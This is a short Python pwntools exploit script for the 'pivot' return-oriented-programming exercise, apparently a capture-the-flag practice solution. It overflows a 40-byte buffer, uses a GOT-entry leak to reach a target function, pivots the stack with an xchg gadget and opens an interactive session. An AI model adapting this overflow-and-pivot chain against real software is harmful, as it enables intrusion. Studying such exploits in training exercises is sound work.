11cbb37694
new file: x86_64/pivot/exploit2.py deleted: x86_64/pivot/stest deleted: x86_64/pivot/test new file: x86_64/pivot/todo new file: x86_64/ret2csu/exploit.py new file: x86_64/ret2csu/gadgets
36 lines
1.0 KiB
Python
Executable File
36 lines
1.0 KiB
Python
Executable File
#!/usr/bin/env python3
|
|
from pwn import *
|
|
from os import getcwd
|
|
import re
|
|
|
|
prog = process('./pivot')
|
|
|
|
payload = b''
|
|
payload += p64(0x0000000000400720) # foothold@plt
|
|
|
|
payload += p64(0x4009bb) # pop rax
|
|
payload += p64(0x601040) # foothold@plt's .got.plt entry
|
|
payload += p64(0x4009c0) # mov rax, [rax]
|
|
|
|
payload += p64(0x00000000004007c8) # pop rbp
|
|
payload += p64(279) # should be the offset of pwnem from foothold's .got.plt
|
|
|
|
payload += p64(0x4009c4) # adds the two
|
|
|
|
payload += p64(0x00000000004007c1) # jmp rax
|
|
prog.sendline(payload)
|
|
pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
|
|
|
|
payload = b''
|
|
#buffer overflow
|
|
for c in range(40):
|
|
payload += b'a'
|
|
|
|
payload += p64(0x4009bb) # pop rax
|
|
payload += p64(pivit_location) # pivot location
|
|
payload += p64(0x4009bd) # xchg rsp,rax
|
|
|
|
prog.sendlineafter('Now please send your stack smash', payload)
|
|
prog.interactive()
|
|
|